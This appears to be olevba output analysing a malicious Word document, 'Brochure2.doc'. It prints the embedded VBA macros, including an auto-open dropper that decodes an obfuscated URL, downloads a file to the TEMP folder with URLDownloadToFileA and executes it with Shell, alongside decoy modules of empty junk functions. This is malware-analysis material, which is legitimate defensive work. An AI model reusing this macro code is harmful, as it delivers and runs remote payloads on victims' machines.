Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS---- Brochure2.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: Brochure2.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: Brochure2.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. eE5Ueh5
17. End Sub
18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
19. ANALYSIS:
20. +----------+----------+---------------------------------------+
21. | Type     | Keyword  | Description                           |
22. +----------+----------+---------------------------------------+
23. | AutoExec | AutoOpen | Runs when the Word document is opened |
24. +----------+----------+---------------------------------------+
25. -------------------------------------------------------------------------------
26. VBA MACRO Class1.cls
27. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class1'
28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
29.  
30. Private Function PvEED()
31.  
32. End Function
33. Public Function tYlkADG()
34.  
35. End Function
36. Private Sub fOxzTwB()
37.  
38. End Sub
39. Private Function HvhIfeFnE()
40.  
41. End Function
42. Private Function uGASPmHgZUgxMi()
43.  
44. End Function
45. Public Sub xbdIdjqgLUV()
46.  
47. End Sub
48. Public Function CJoBAQTQO()
49.  
50. End Function
51. Private Sub gNPkMRfcK()
52.  
53. End Sub
54. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
55. ANALYSIS:
56. No suspicious keyword or IOC found.
57. -------------------------------------------------------------------------------
58. VBA MACRO ÀÀâûàûâà.bas
59. in file: Brochure2.doc - OLE stream: u'Macros/VBA/\u0410\u0410\u0432\u044b\u0430\u044b\u0432\u0430'
60. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
61. #If VBA7 Then
62.     Private Declare PtrSafe Function dfsdfsdfsdf Lib "urlmon" Alias _
63.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
64.     ByVal sdfsdFFdsf As String, _
65.     ByVal sdfsdFFdsff As String, _
66.     ByVal sdfsdFFdsffd As Long, _
67.     ByVal sdfsdFFdsffds As LongPtr) As LongPtr
68. #Else
69.     Private Declare Function dfsdfsdfsdf Lib "urlmon" Alias _
70.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
71.     ByVal sdfsdFFdsf As String, _
72.     ByVal sdfsdFFdsff As String, _
73.     ByVal sdfsdFFdsffd As Long, _
74.     ByVal sdfsdFFdsffds As Long) As Long
75. #End If
76.  
77. Function E1MwLaU707(BcbMtG1 As String, o04C As String) As Boolean
78. vJHKBJdfkgfg = dfsdfsdfsdf(0&, BcbMtG1, o04C, 0&, 0&)
79. fTb_A = Shell(o04C, 1)
80. End Function
81.  
82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
83. ANALYSIS:
84. +------------+--------------------+-----------------------------------------+
85. | Type       | Keyword            | Description                             |
86. +------------+--------------------+-----------------------------------------+
87. | Suspicious | Lib                | May run code from a DLL                 |
88. | Suspicious | Shell              | May run an executable file or a system  |
89. |            |                    | command                                 |
90. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
91. +------------+--------------------+-----------------------------------------+
92. -------------------------------------------------------------------------------
93. VBA MACRO Class2.cls
94. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class2'
95. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
96.  
97. Private Sub xMiUfC()
98.  
99. End Sub
100. Private Sub Idjqg()
101.  
102. End Sub
103. Public Sub TZwCJoBAQTQOoCv()
104.  
105. End Sub
106. Public Sub kMRfcKYxxZhuV()
107.  
108. End Sub
109. Public Function KlLQQjRpY()
110.  
111. End Function
112. Private Sub wNdkmvS()
113.  
114. End Sub
115. Public Sub agzHwcYYQ()
116.  
117. End Sub
118. Public Sub arRQhQaRqTyweS()
119.  
120. End Sub
121. Private Sub isbbNNpyKmGlJc()
122.  
123. End Sub
124. Private Sub SliFpzFBNefACLj()
125.  
126. End Sub
127. Private Function qwPYMsoonsdV()
128.  
129. End Function
130. Private Sub TknqiGOyujDuk()
131.  
132. End Sub
133. Private Sub reQsObpQ()
134.  
135. End Sub
136. Private Function EspjBy()
137.  
138. End Function
139. Private Function VRehvQScmhKasM()
140.  
141. End Function
142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
143. ANALYSIS:
144. No suspicious keyword or IOC found.
145. -------------------------------------------------------------------------------
146. VBA MACRO Module2.bas
147. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module2'
148. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
149.  
150. Public Function VQuwdjCKzfbbafP(nqtlJnRBxmGxoBL As String) As String
151. For uiTvResardhH = 1 To Len(nqtlJnRBxmGxoBL) Step 2
152. VQuwdjCKzfbbafP = VQuwdjCKzfbbafP & Mid(nqtlJnRBxmGxoBL, uiTvResardhH, 1)
153. Next
154. End Function
155. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
156. ANALYSIS:
157. No suspicious keyword or IOC found.
158. -------------------------------------------------------------------------------
159. VBA MACRO Module3.bas
160. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module3'
161. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
162. (empty macro)
163. -------------------------------------------------------------------------------
164. VBA MACRO Module4.bas
165. in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module4'
166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
167. Public Sub YjplwNdk()
168.  
169. End Sub
170. Public Function NrtagzHwcYYQbM()
171.  
172. End Function
173. Private Sub RQhQaRqT()
174.  
175. End Sub
176. Public Function SndTi()
177.  
178. End Function
179. Private Sub NNpyK()
180.  
181. End Sub
182. Private Sub JcncZSl()
183.  
184. End Sub
185. Public Function zFBNefAC()
186.  
187. End Function
188. Private Function tJqwPYMsoonsdV()
189.  
190. End Function
191. Private Sub TknqiG()
192.  
193. End Sub
194. Public Sub ujDukyIrre()
195.  
196. End Sub
197. Private Function bpQoaeEspjByV()
198.  
199. End Function
200. Private Function RehvQScmhKasMga()
201.  
202. End Function
203. Private Function EDItmtYlkAD()
204.  
205. End Function
206. Private Function mfOxzTwBOZuHvhI()
207.  
208. End Function
209. Sub eE5Ueh5()
210. E1MwLaU707 VQuwdjCKzfbbafP("ht@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
211. End Sub
212. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
213. ANALYSIS:
214. +------------+---------+---------------------------------------+
215. | Type       | Keyword | Description                           |
216. +------------+---------+---------------------------------------+
217. | Suspicious | Environ | May read system environment variables |
218. +------------+---------+---------------------------------------+
219. -------------------------------------------------------------------------------
220. VBA MACRO UserForm1.frm
221. in file: Brochure2.doc - OLE stream: u'Macros/VBA/UserForm1'
222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
223. (empty macro)